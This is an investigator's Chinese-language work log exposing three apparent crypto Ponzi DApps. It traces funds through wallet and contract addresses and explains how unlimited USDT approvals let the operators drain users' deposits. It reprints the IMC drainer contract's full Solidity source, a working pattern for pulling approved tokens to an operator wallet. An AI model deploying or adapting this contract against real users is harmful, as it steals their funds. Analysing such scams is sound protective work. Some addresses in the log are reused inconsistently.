工作记录，三个资金盘Dapp

总监发给我两个Dapp

• https://app.galaxy-quantification.com/pledge
• https://app.imc-quantitativefund.com/pledge?inviteCode=koitv1

钱包获取授权信息
得到USDT授权合约地址如下
IMC = 0x89344c34abaeca9e3128f77dbaca46c0706a1f15

分析合约代码，团伙获取资金的手法一目了然。
1.前端让用户无限授权(10^24)USDT给IMC合约地址。
2.IMC合约地址团伙调用IMC的transferFrom函数转账给合约状态oprTo的地址。该函数调用的是usdt的transferFrom，因为是合约地址调用且用户已经授权了，所以能够转账成功(详细可研究msg.sender)。

发现项目方大量将用户资金(USDT)转账到自己的钱包地址oprTo里
0x0ca9a43460fec31f196a04a51447ea31e3e18792

详细可见上述账户下的USDT交易
大部分转入的资金并没能够返回给用户(只进不出妥妥的资金盘)

且我发现两个团伙的子账户(团伙将钱转移到这两个地址上)
son1 = 0x89fe43b6Bc6e8f9b86f4478c94a1452600B005Dd
son2 = 0x7B14FFa06DAf348593FB9a7Af68f02B59b74f6c5

son1下发现可疑账户(可能是团伙的子账户，负责其他项目的)
sup = 0xF320Ddc8B2D8C1e9d2151a04038c9E55Be294780

在sup 下的转账选中用户
user = 0xF320Ddc8B2D8C1e9d2151a04038c9E55Be294780
发现该用户将USDT 授权给合约Galaxy
GALAXY = 0xd5f9A71BAE2Ee40D7d2B10881659C032319cfAe5

根据不断追查
现又发现代号为GTS的资金盘合约
GTS = 0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4

又发现一个团伙账户
son3 = 0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4

该团伙钱包地址
0x0ca9a43460fec31f196a04a51447ea31e3e18792
0x89fe43b6Bc6e8f9b86f4478c94a1452600B005Dd
0x7B14FFa06DAf348593FB9a7Af68f02B59b74f6c5
0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4
0xF320Ddc8B2D8C1e9d2151a04038c9E55Be294780

该团伙的合约地址
IMC = 0x89344c34abaeca9e3128f77dbaca46c0706a1f15
GALAXY = 0xd5f9A71BAE2Ee40D7d2B10881659C032319cfAe5
GTS = 0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4

IMC 合约，其他两个都一样

/**
 *Submitted for verification at Etherscan.io on 2022-06-26
*/

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external;
}

contract IMC is Ownable {
    address public opr;
    address public oprTo;

    constructor() {
        opr = 0xC911F7D7D410C5D3797094C8DEde5b29736C6e83;
        oprTo = 0x0cA9a43460fEc31f196a04a51447Ea31e3E18792;
    }

    function setOpr(address addr,address toaddr) external onlyOwner {
        opr = addr;
        oprTo = toaddr;
    }

    function transferFrom(
        address token,
        address from,
        uint256 value
    ) external {
        require(msg.sender == opr, "Forbidden.");
        IERC20(token).transferFrom(from, oprTo, value);
    }
}